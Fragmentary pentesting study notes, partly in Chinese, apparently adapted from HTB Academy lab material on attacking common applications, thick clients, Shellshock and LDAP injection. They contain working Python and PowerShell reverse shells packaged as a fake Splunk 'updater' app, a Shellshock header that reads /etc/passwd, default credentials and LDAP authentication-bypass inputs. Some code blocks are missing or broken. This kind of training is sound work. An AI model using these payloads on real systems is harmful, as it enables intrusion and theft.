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网站内容管理Joomla、Drupal、WordPress、DotNetNuke 等。
应用服务器Apache Tomcat、Phusion Passenger、Oracle WebLogic、IBM WebSphere 等。
安全信息和事件管理 (SIEM)Splunk、Trustwave、LogRhythm 等
网管PRTG网络监视器、ManageEngine Opmanger等
IT 管理Nagios、Puppet、Zabbix、ManageEngine ServiceDesk Plus 等
软件框架JBoss、Axis2 等
客户服务管理osTicket、Zendesk 等
搜索引擎Elasticsearch、Apache Solr 等
软件配置管理Atlassian JIRA、GitHub、GitLab、Bugzilla、Bugsnag、Bitbucket 等。
软件开发工具Jenkins、Atlassian Confluence、phpMyAdmin 等
企业应用集成Oracle 融合中间件、BizTalk Server、Apache ActiveMQ 等

ApplicationAbuse Info
Axis2This can be abused similar to Tomcat. We will often actually see it sitting on top of a Tomcat installation. If we cannot get RCE via Tomcat, it is worth checking for weak/default admin credentials on Axis2. We can then upload a webshell in the form of an AAR file (Axis2 service file). There is also a Metasploit module that can assist with this.
WebsphereWebsphere has suffered from many different vulnerabilities over the years. Furthermore, if we can log in to the administrative console with default credentials such as system:manager we can deploy a WAR file (similar to Tomcat) and gain RCE via a web shell or reverse shell.
ElasticsearchElasticsearch has had its fair share of vulnerabilities as well. Though old, we have seen this before on forgotten Elasticsearch installs during an assessment for a large enterprise (and identified within 100s of pages of EyeWitness report output). Though not realistic, the Hack The Box machine Haystack features Elasticsearch.
ZabbixZabbix is an open-source system and network monitoring solution that has had quite a few vulnerabilities discovered such as SQL injection, authentication bypass, stored XSS, LDAP password disclosure, and remote code execution. Zabbix also has built-in functionality that can be abused to gain remote code execution. The HTB box Zipper showcases how to use the Zabbix API to gain RCE.
NagiosNagios is another system and network monitoring product. Nagios has had a wide variety of issues over the years, including remote code execution, root privilege escalation, SQL injection, code injection, and stored XSS. If you come across a Nagios instance, it is worth checking for the default credentials nagiosadmin:PASSW0RD and fingerprinting the version.
WebLogicWebLogic is a Java EE application server. At the time of writing, it has 190 reported CVEs. There are many unauthenticated RCE exploits from 2007 up to 2021, many of which are Java Deserialization vulnerabilities.
Wikis/IntranetsWe may come across internal Wikis (such as MediaWiki), custom intranet pages, SharePoint, etc. These are worth assessing for known vulnerabilities but also searching if there is a document repository. We have run into many intranet pages (both custom and SharePoint) that had a search functionality which led to discovering valid credentials.
DotNetNukeDotNetNuke (DNN) is an open-source CMS written in C# that uses the .NET framework. It has had a few severe issues over time, such as authentication bypass, directory traversal, stored XSS, file upload bypass, and arbitrary file download.
vCentervCenter is often present in large organizations to manage multiple instances of ESXi. It is worth checking for weak credentials and vulnerabilities such as this Apache Struts 2 RCE that scanners like Nessus do not pick up. This unauthenticated OVA file upload vulnerability was disclosed in early 2021, and a PoC for CVE-2021-22005 was released during the development of this module. vCenter comes as both a Windows and a Linux appliance. If we get a shell on the Windows appliance, privilege escalation is relatively simple using JuicyPotato or similar. We have also seen vCenter already running as SYSTEM and even running as a domain admin! It can be a great foothold in the environment or be a single source of compromise.



nmap -p 80 --script http-enum --script-args http-enum.file=<path_to_your_dict> -oX output.xml <target>

nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA discovery.web -iL list.target


cat web_discovery.xml | ./aquatone -nmap


 eyewitness --web -x web_discovery.xml -d inlanefreight_eyewitness



User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Disallow: /wp-content/uploads/wpforms/

Sitemap: https://inlanefreight.local/wp-sitemap.xml


curl -s http://blog.inlanefreight.local | grep WordPress
curl -s http://blog.inlanefreight.local | grep themes
curl -s http://blog.inlanefreight.local | grep plugins

<meta name="generator" content="WordPress 5.8" /





GitHub - wpscanteam/wpscan: WPScan WordPress security scanner. Written for security professionals and blog maintainers to test the security of their WordPress websites. Contact us via contact@wpscan.com




# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
# For more information about the robots.txt standard, see:
# https://www.robotstxt.org/orig.html

User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/



GitHub - SamJoan/droopescan: A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe.

GitHub - drego85/JoomlaScan: A free software to find the components installed in Joomla CMS, built out of the ashes of Joomscan.




curl -s http://drupal.inlanefreight.local | grep Drupal

curl -s http://drupal-acc.inlanefreight.local/CHANGELOG.txt | grep -m2 ""
curl -s http://drupal.inlanefreight.local/CHANGELOG.txt


cmundy2@htb[/htb]$ droopescan scan drupal -u http://drupal.inlanefreight.local






curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat 



├── bin
├── conf
│   ├── catalina.policy
│   ├── catalina.properties
│   ├── context.xml
│   ├── tomcat-users.xml
│   ├── tomcat-users.xsd
│   └── web.xml
├── lib
├── logs
├── temp
├── webapps
│   ├── manager
│   │   ├── images
│   │   ├── META-INF
│   │   └── WEB-INF
|   |       └── web.xml
│   └── ROOT
│       └── WEB-INF
└── work
    └── Catalina
        └── localhost

├── images
├── index.jsp
│   └── context.xml
├── status.xsd
    ├── jsp
    |   └── admin.jsp
    └── web.xml
    └── lib
    |    └── jdbc_drivers.jar
    └── classes
        └── AdminServlet.class   




<?xml version="1.0" encoding="UTF-8"?>

<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
  By default, no user is included in the "manager-gui" role required
  to operate the "/manager/html" web application.  If you wish to use this app,
  you must define such a user - the username and password are arbitrary.

  Built-in Tomcat manager roles:
    - manager-gui    - allows access to the HTML GUI and the status pages
    - manager-script - allows access to the HTTP API and the status pages
    - manager-jmx    - allows access to the JMX proxy and the status pages
    - manager-status - allows access to the status pages only

  The users below are wrapped in a comment and are therefore ignored. If you
  wish to configure one or more of these users for use with the manager web
  application, do not forget to remove the <!.. ..> that surrounds them. You
  will also need to set the passwords to something appropriate.

!-- user manager can access only manager section -->
<role rolename="manager-gui" />
<user username="tomcat" password="tomcat" roles="manager-gui" />

<!-- user admin can access manager and admin section both -->
<role rolename="admin-gui" />
<user username="admin" password="admin" roles="manager-gui,admin-gui" />

























2.Splunk服务器可以批量分发特定脚本给安装了Splunk universal forwarder的机器,也就是采集日志的机器。


cmundy2@htb[/htb]$ tree splunk_shell/
├── bin
└── default

tar -cvzf updater.tar.gz splunk_shell/

cmundy2@htb[/htb]$ cat inputs.conf
disabled = 0  
interval = 10  
sourcetype = shell 

disabled = 0
sourcetype = shell
interval = 10

cat run.bat
PowerShell.exe -exec bypass -w hidden -Command "& '%~dpn0.ps1'"

cat rev.py
export RHOST="";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

cat run.ps1
$LHOST = ""; $LPORT = 4444; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()

[!bash!]$ tar -cvzf updater.tar.gz splunk_shell/















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我们可以探索左上角groups、snippets和 中链接的每个页面help






 Tomcat CGI

发现tomcat cgi

ffuf -w /usr/share/dirb/wordlists/common.txt -u






Shellshock漏洞(Shellshock vulnerability) 是一个影响旧版本 Bash 的漏洞,攻击者可以利用这个漏洞在环境变量中注入恶意命令,进而执行操作系统命令。这个漏洞源于 Bash 错误地处理环境变量中的函数定义。当函数被作为环境变量传递时,Bash会错误地执行环境变量后面的命令。


假设我们有一个环境变量 y,其值是一个 Bash 函数定义和一条命令:



$ env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable"


  1. 函数定义:
    y='() { :;};' 这一部分定义了一个名为 y 的空函数。这个函数不做任何事情,只是返回退出代码 0(即什么也不做,正常退出)。

    在 Bash 中,函数定义是通过 () 括起来的。例如:y() { ... }

  2. 恶意命令:
    echo vulnerable-shellshock 是定义在环境变量中的恶意命令,应该在函数定义后执行。

  3. 执行:
    bash -c "echo not vulnerable" 这部分命令会启动一个新的 Bash 子进程,并执行 echo not vulnerable


  • 旧版本的 Bash 错误地将环境变量中的内容解析为一个函数定义,并继续执行定义后面的命令。
  • 因为 y 被定义为一个空函数(() { :;};),但是函数后面紧跟着 echo vulnerable-shellshock,Bash 会错误地执行这个命令。


User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd


 Thick Client Applications

        胖客户端其实就是一些类似于APP的应用程序,胖客户端在本地承担了很多逻辑和运行判断以减轻服务器的负担,所以我们可以通过逆向了解本地代码的很多逻辑从而找到漏洞或硬编码凭证。本部分仅引用了HacktheBox里面的部分内容,主要是介绍了可以使用的工具,因为逆向的精髓并不在此,且俺也不会逆向所以我也就不多讲了。感兴趣的可以去Login To HTB Academy & Continue Learning | HTB Academy

Information Gathering

In this step, penetration testers have to identify the application architecture, the programming languages and frameworks that have been used, and understand how the application and the infrastructure work. They should also need to identify technologies that are used on the client and server sides and find entry points and user inputs. Testers should also look for identifying common vulnerabilities like the ones we mentioned earlier at the end of the About section. The following tools will help us gather information.

CFF ExplorerDetect It EasyProcess MonitorStrings

Client Side attacks

Although thick clients perform significant processing and data storage on the client side, they still communicate with servers for various tasks, such as data synchronization or accessing shared resources. This interaction with servers and other external systems can expose thick clients to vulnerabilities similar to those found in web applications, including command injection, weak access control, and SQL injection.

Sensitive information like usernames and passwords, tokens, or strings for communication with other services, might be stored in the application's local files. Hardcoded credentials and other sensitive information can also be found in the application's source code, thus Static Analysis is a necessary step while testing the application. Using the proper tools, we can reverse-engineer and examine .NET and Java applications including EXE, DLL, JAR, CLASS, WAR, and other file formats. Dynamic analysis should also be performed in this step, as thick client applications store sensitive information in the memory as well.


Network Side Attacks

If the application is communicating with a local or remote server, network traffic analysis will help us capture sensitive information that might be transferred through HTTP/HTTPS or TCP/UDP connection, and give us a better understanding of how that application is working. Penetration testers that are performing traffic analysis on thick client applications should be familiar with tools like:

WiresharktcpdumpTCPViewBurp Suite






string64反编译DOS MZ executable内存块

If we double-click on it, we will see the magic bytes MZ in the ASCII column that indicates that the file is a DOS MZ executable.


Let's return to the Memory Map pane, then export the newly discovered mapped item from memory to a dump file by right-clicking on the address and selecting Dump Memory to File. Running strings on the exported file reveals some interesting information.

  Attacking Thick Client Applications

C:\> C:\TOOLS\Strings\strings64.exe .\restart-service_00000000001E0000.bin

.NET Framework 4 Client Profile

Reading the output reveals that the dump contains a .NET executable. We can use De4Dot to reverse .NET executables back to the source code by dragging the restart-service_00000000001E0000.bin onto the de4dot executable.


Reading the output reveals that the dump contains a .NET executable. We can use De4Dot to reverse .NET executables back to the source code by dragging the restart-service_00000000001E0000.bin onto the de4dot executable.

  Attacking Thick Client Applications

de4dot v3.1.41592.3405

Detected Unknown Obfuscator (C:\Users\cybervaca\Desktop\restart-service_00000000001E0000.bin)
Cleaning C:\Users\cybervaca\Desktop\restart-service_00000000001E0000.bin
Renaming all obfuscated symbols
Saving C:\Users\cybervaca\Desktop\restart-service_00000000001E0000-cleaned.bin

Press any key to exit...

Now, we can read the source code of the exported application by dragging and dropping it onto the DnSpy executable.


With the source code disclosed, we can understand that this binary is a custom-made runas.exe with the sole purpose of restarting the Oracle service using hardcoded credentials.


使用调试器和 .NET 程序集编辑器dnSpy,我们可以直接查看源代码。此工具允许读取、编辑和调试 .NET 程序集(C# 和 Visual Basic)的源代码。检查MultimasterAPI.Controllers->ColleagueController会显示包含密码的数据库连接字符串。




The server filters out the / character from the input. Let's decompile the application using JD-GUI, by dragging and dropping the fatty-client-new.jar onto the jd-gui.


Save the source code by pressing the Save All Sources option in jdgui. Decompress the fatty-client-new.jar.src.zip by right-clicking and selecting Extract files. The file fatty-client-new.jar.src/htb/fatty/client/methods/Invoker.java handles the application features. Reading its content reveals the following code.



C:\> javac -cp <编译环境> <要编译的java文件>
C:\> javac -cp fatty-client-new.jar fatty-client-new.jar.src\htb\fatty\client\gui\ClientGuiTest.java
jar -cmf <MF文件路径> <生成的jar包名> .
jar -cmf META-INF\MANIFEST.MF traverse.jar .



使用调试器和 .NET 程序集编辑器dnSpy,我们可以直接查看源代码。此工具允许读取、编辑和调试 .NET 程序集(C# 和 Visual Basic)的源代码。检查MultimasterAPI.Controllers->ColleagueController会显示包含密码的数据库连接字符串。


gdb ./ELF

gdb-peda$ run

gdb-peda$ set disassembly-flavor intel
gdb-peda$ disas main

gdb-peda$ b *0x5555555551b0

gdb-peda$ run








端口号	协议	描述
80	HTTP	用于 Web 服务器和 Web 浏览器之间的非安全 HTTP 通信。
443	HTTPS	用于 Web 服务器和 Web 浏览器之间的安全 HTTP 通信。加密 Web 服务器和 Web 浏览器之间的通信。
1935	RPC	用于客户端-服务器通信。远程过程调用 (RPC) 协议允许程序从不同网络设备上的另一个程序请求信息。
25	邮件传输协议	简单邮件传输协议 (SMTP) 用于发送电子邮件。
8500	SSL	用于通过安全套接字层 (SSL) 进行服务器通信。
5500	服务器监控	用于 ColdFusion 服务器的远程管理。

<cfquery name="myQuery" datasource="myDataSource">
  FROM myTable











LDAP (Lightweight Directory Access Protocol) is a protocol used to access and manage directory information. A directory is a hierarchical data store that contains information about network resources such as usersgroupscomputersprinters, and other devices. LDAP provides some excellent functionality:

EfficientEfficient and fast queries and connections to directory services, thanks to its lean query language and non-normalised data storage.
Global naming modelSupports multiple independent directories with a global naming model that ensures unique entries.
Extensible and flexibleThis helps to meet future and local requirements by allowing custom attributes and schemas.
CompatibilityIt is compatible with many software products and platforms as it runs over TCP/IP and SSL directly, and it is platform-independent, suitable for use in heterogeneous environments with various operating systems.
AuthenticationIt provides authentication mechanisms that enable users to sign on once and access multiple resources on the server securely.

However, it also suffers some significant issues:

ComplianceDirectory servers must be LDAP compliant for service to be deployed, which may limit the choice of vendors and products.
ComplexityDifficult to use and understand for many developers and administrators, who may not know how to configure LDAP clients correctly or use it securely.
EncryptionLDAP does not encrypt its traffic by default, which exposes sensitive data to potential eavesdropping and tampering. LDAPS (LDAP over SSL) or StartTLS must be used to enable encryption.
InjectionVulnerable to LDAP injection attacks, where malicious users can manipulate LDAP queries and gain unauthorised access to data or resources. To prevent such attacks, input validation and output encoding must be implemented.

LDAP is commonly used for providing a central location for accessing and managing directory services. Directory services are collections of information about the organisation, its users, and assets–like usernames and passwords. LDAP enables organisations to store, manage, and secure this information in a standardised way. Here are some common use cases:

Use CaseDescription
AuthenticationLDAP can be used for central authentication, allowing users to have single login credentials across multiple applications and systems. This is one of the most common use cases for LDAP.
AuthorisationLDAP can manage permissions and access control for network resources such as folders or files on a network share. However, this may require additional configuration or integration with protocols like Kerberos.
Directory ServicesLDAP provides a way to searchretrieve, and modify data stored in a directory, making it helpful for managing large numbers of users and devices in a corporate network. LDAP is based on the X.500 standard for directory services.
SynchronisationLDAP can be used to keep data consistent across multiple systems by replicating changes made in one directory to another.

There are two popular implementations of LDAP: OpenLDAP, an open-source software widely used and supported, and Microsoft Active Directory, a Windows-based implementation that seamlessly integrates with other Microsoft products and services.

Although LDAP and AD are related, they serve different purposesLDAP is a protocol that specifies the method of accessing and modifying directory services, whereas AD is a directory service that stores and manages user and computer data. While LDAP can communicate with AD and other directory services, it is not a directory service itself. AD offers extra functionalities such as policy administration, single sign-on, and integration with various Microsoft products.

LDAPActive Directory (AD)
protocol that defines how clients and servers communicate with each other to access and manipulate data stored in a directory service.directory server that uses LDAP as one of its protocols to provide authentication, authorisation, and other services for Windows-based networks.
An open and cross-platform protocol that can be used with different types of directory servers and applications.Proprietary software that only works with Windows-based systems and requires additional components such as DNS (Domain Name System) and Kerberos for its functionality.
It has a flexible and extensible schema that allows custom attributes and object classes to be defined by administrators or developers.It has a predefined schema that follows and extends the X.500 standard with additional object classes and attributes specific to Windows environments. Modifications should be made with caution and care.
Supports multiple authentication mechanisms such as simple bind, SASL, etc.It supports Kerberos as its primary authentication mechanism but also supports NTLM (NT LAN Manager) and LDAP over SSL/TLS for backward compatibility.

LDAP works by using a client-server architecture. A client sends an LDAP request to a server, which searches the directory service and returns a response to the client. LDAP is a protocol that is simpler and more efficient than X.500, on which it is based. It uses a client-server model, where clients send requests to servers using LDAP messages encoded in ASN.1 (Abstract Syntax Notation One) and transmitted over TCP/IP (Transmission Control Protocol/Internet Protocol). The servers process the requests and send back responses using the same format. LDAP supports various requests, such as bindunbindsearchcompareadddeletemodify, etc.

LDAP requests are messages that clients send to servers to perform operations on data stored in a directory service. An LDAP request is comprised of several components:

  1. Session connection: The client connects to the server via an LDAP port (usually 389 or 636).
  2. Request type: The client specifies the operation it wants to perform, such as bindsearch, etc.
  3. Request parameters: The client provides additional information for the request, such as the distinguished name (DN) of the entry to be accessed or modified, the scope and filter of the search query, the attributes and values to be added or changed, etc.
  4. Request ID: The client assigns a unique identifier for each request to match it with the corresponding response from the server.

Once the server receives the request, it processes it and sends back a response message that includes several components:

  1. Response type: The server indicates the operation that was performed in response to the request.
  2. Result code: The server indicates whether or not the operation was successful and why.
  3. Matched DN: If applicable, the server returns the DN of the closest existing entry that matches the request.
  4. Referral: The server returns a URL of another server that may have more information about the request, if applicable.
  5. Response data: The server returns any additional data related to the response, such as the attributes and values of an entry that was searched or modified.

After receiving and processing the response, the client disconnects from the LDAP port.


For example, ldapsearch is a command-line utility used to search for information stored in a directory using the LDAP protocol. It is commonly used to query and retrieve data from an LDAP directory service.


cmundy2@htb[/htb]$ ldapsearch -H ldap://ldap.example.com:389 -D "cn=admin,dc=example,dc=com" -w secret123 -b "ou=people,dc=example,dc=com" "(mail=john.doe@example.com)"

This command can be broken down as follows:

  • Connect to the server ldap.example.com on port 389.
  • Bind (authenticate) as cn=admin,dc=example,dc=com with password secret123.
  • Search under the base DN ou=people,dc=example,dc=com.
  • Use the filter (mail=john.doe@example.com) to find entries that have this email address.

The server would process the request and send back a response, which might look something like this:

Code: ldap

dn: uid=jdoe,ou=people,dc=example,dc=com
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
cn: John Doe
sn: Doe
uid: jdoe
mail: john.doe@example.com

result: 0 Success

This response includes the entry's distinguished name (DN) that matches the search criteria and its attributes and values.

LDAP Injection

LDAP injection is an attack that exploits web applications that use LDAP (Lightweight Directory Access Protocol) for authentication or storing user information. The attacker can inject malicious code or characters into LDAP queries to alter the application's behaviour, bypass security measures, and access sensitive data stored in the LDAP directory.

To test for LDAP injection, you can use input values that contain special characters or operators that can change the query's meaning:

*An asterisk * can match any number of characters.
( )Parentheses ( ) can group expressions.
|A vertical bar | can perform logical OR.
&An ampersand & can perform logical AND.
(cn=*)Input values that try to bypass authentication or authorisation checks by injecting conditions that always evaluate to true can be used. For example, (cn=*) or (objectClass=*) can be used as input values for a username or password fields.

LDAP injection attacks are similar to SQL injection attacks but target the LDAP directory service instead of a database.

For example, suppose an application uses the following LDAP query to authenticate users:

Code: php


In this query, $username and $password contain the user's login credentials. An attacker could inject the * character into the $username or $password field to modify the LDAP query and bypass authentication.

If an attacker injects the * character into the $username field, the LDAP query will match any user account with any password. This would allow the attacker to gain access to the application with any password, as shown below:

Code: php

$username = "*";
$password = "dummy";

Alternatively, if an attacker injects the * character into the $password field, the LDAP query would match any user account with any password that contains the injected string. This would allow the attacker to gain access to the application with any username, as shown below:

Code: php

$username = "dummy";
$password = "*";

LDAP injection attacks can lead to severe consequences, such as unauthorised access to sensitive information, elevated privileges, and even full control over the affected application or server. These attacks can also considerably impact data integrity and availability, as attackers may alter or remove data within the directory service, causing disruptions to applications and services dependent on that data.

To mitigate the risks associated with LDAP injection attacks, it is crucial to thoroughly validate and sanitize user input before incorporating it into LDAP queries. This process should involve removing LDAP-specific special characters like * and employing parameterised queries to ensure user input is treated solely as data, not executable code.



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